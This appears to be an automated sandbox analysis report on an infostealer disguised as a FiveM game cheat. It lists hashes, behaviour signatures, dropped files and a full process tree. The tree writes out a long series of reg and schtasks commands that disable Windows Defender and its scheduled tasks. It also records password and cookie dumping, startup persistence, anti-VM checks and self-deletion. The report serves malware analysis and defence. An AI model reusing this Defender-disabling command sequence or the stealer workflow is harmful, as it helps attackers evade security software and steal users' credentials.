Analysis
max time kernel: 117s
max time network: 117s
platform: windows7_x64
resource: win7-en-20211104
submitted: 03-12-2021 18:08
Static task: static1
Behavioral task: behavioral1
Sample: LOAD FIVEM HACK.exe
Resource: win7-en-20211104
General
Target: LOAD FIVEM HACK.exe
Size: 19.1MB
MD5: 41cc3c19dac08d2c7365d897d396733e
SHA1: 7eb01e9812ce1cea266ad43c4dce589ec8495818
SHA256: 80cf0f9c2763be12d717c88bc1a22b94d93e5c9055fb8d6ce2e9fe58a2bd9e23
SHA512: 479bc22aae5c78007d6b4683ff2dfa5456685ae687b5a0b3ff1668b1baa1769c94495ed00ad44a6f9649fca4ec3f5a5e299600826dc331decd57e03ea08f0eb6
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource | yara_rule
behavioral1/memory/852-75-0x000000001B360000-0x000000001B69B000-memory.dmp | WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | WebBrowserPassView
-
Nirsoft 9 IoCs
Processes:
resource | yara_rule
behavioral1/memory/852-75-0x000000001B360000-0x000000001B69B000-memory.dmp | Nirsoft
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\xwizard.exe | Nirsoft
C:\Users\Admin\AppData\Local\Temp\xwizard.exe | Nirsoft
-
Executes dropped EXE 9 IoCs
Processes:
LoaderPB.exe, PROPB.exe, RtkBtManServ.exe, bfsvc.exe, snuvcdsm.exe, winhlp32.exe, splwow64.exe, hh.exe, xwizard.exe
pid | process
1808 | LoaderPB.exe
484 | PROPB.exe
852 | RtkBtManServ.exe
876 | bfsvc.exe
1164 | snuvcdsm.exe
240 | winhlp32.exe
912 | splwow64.exe
1116 | hh.exe
928 | xwizard.exe
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe | upx
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe | upx
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe | vmprotect
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
PROPB.exe, LOAD FIVEM HACK.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | PROPB.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | PROPB.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | LOAD FIVEM HACK.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | LOAD FIVEM HACK.exe
-
Drops startup file 2 IoCs
Processes:
PROPB.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1685878.exe | PROPB.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1685878.exe | PROPB.exe
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
PROPB.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Wine | PROPB.exe
-
Loads dropped DLL 1 IoCs
Processes:
PROPB.exe
pid | process
484 | PROPB.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
RtkBtManServ.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | RtkBtManServ.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | RtkBtManServ.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | RtkBtManServ.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
Processes:
bfsvc.exe, snuvcdsm.exe, winhlp32.exe, splwow64.exe, hh.exe, xwizard.exe
pid | process
876 | bfsvc.exe
1164 | snuvcdsm.exe
240 | winhlp32.exe
912 | splwow64.exe
1116 | hh.exe
928 | xwizard.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
choice.exe, hh.exe, xwizard.exe
pid | process
1164 | choice.exe
1116 | hh.exe
928 | xwizard.exe
928 | xwizard.exe
928 | xwizard.exe
928 | xwizard.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
RtkBtManServ.exe
description | pid | process
Token: SeDebugPrivilege | 852 | RtkBtManServ.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
LOAD FIVEM HACK.exe, PROPB.exe, cmd.exe
description | pid | process | target process
PID 660 wrote to memory of 1808 | 660 | LOAD FIVEM HACK.exe | LoaderPB.exe (×4)
PID 660 wrote to memory of 484 | 660 | LOAD FIVEM HACK.exe | PROPB.exe (×7)
PID 484 wrote to memory of 852 | 484 | PROPB.exe | RtkBtManServ.exe (×4)
PID 484 wrote to memory of 1336 | 484 | PROPB.exe | cmd.exe (×4)
PID 1336 wrote to memory of 1164 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 2000 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 1588 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 1620 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 1608 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 812 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 1760 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 572 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 1048 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 1504 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 304 | 1336 | cmd.exe | reg.exe (×4)
PID 1336 wrote to memory of 764 | 1336 | cmd.exe | reg.exe (×1)
Processes
-
C:\Users\Admin\AppData\Local\Temp\LOAD FIVEM HACK.exe | "C:\Users\Admin\AppData\Local\Temp\LOAD FIVEM HACK.exe" | depth 1
- Checks BIOS information in registry
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe | "C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe" | depth 2
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\PROPB.exe | "C:\Users\Admin\AppData\Local\Temp\PROPB.exe" | depth 2
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" 3DdHBGXJtZaBFfP8HsYgGdL3DLw4WBuf00yKjIbZKNfadE6sLb/cRUFHaOYFIeBtVADw9tL897OeyhzYsQzDhjEXrpur+kVXs9v6R3+2AA54RyMOmii4JNry2VkxJu573ECwzUA60IF1MBrkeAAL3hpNH2t65YhsdjnHjdjrEv4= | depth 3
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" | depth 4
-
C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat | depth 5
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe | C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png" | depth 6
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" | depth 4
-
C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat | depth 5
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt" | depth 6
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" | depth 4
-
C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat | depth 5
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1" | depth 6
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exe | C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2" | depth 6
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\hh.exe | C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3" | depth 6
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" | depth 4
-
C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat | depth 5
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exe | C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt" | depth 6
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" | depth 4
-
C:\Windows\system32\choice.exe | choice /C Y /N /D Y /T 3 | depth 5
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat" | depth 3
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤ | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | depth 4
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | depth 4
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | depth 4
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | depth 4
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | depth 4
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | depth 4
-
C:\Windows\SysWOW64\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | depth 4
- Modifies security service
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\Admin_History.txt
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
C:\Users\Admin\AppData\Local\Temp\Cookies1
C:\Users\Admin\AppData\Local\Temp\Cookies3
C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe
C:\Users\Admin\AppData\Local\Temp\PROPB.exe
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
C:\Users\Admin\AppData\Local\Temp\bfsvc.cfg
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
C:\Users\Admin\AppData\Local\Temp\compile.bat
C:\Users\Admin\AppData\Local\Temp\compile.vbs
C:\Users\Admin\AppData\Local\Temp\config
C:\Users\Admin\AppData\Local\Temp\dav.bat
C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.cfg
C:\Users\Admin\AppData\Local\Temp\xwizard.exe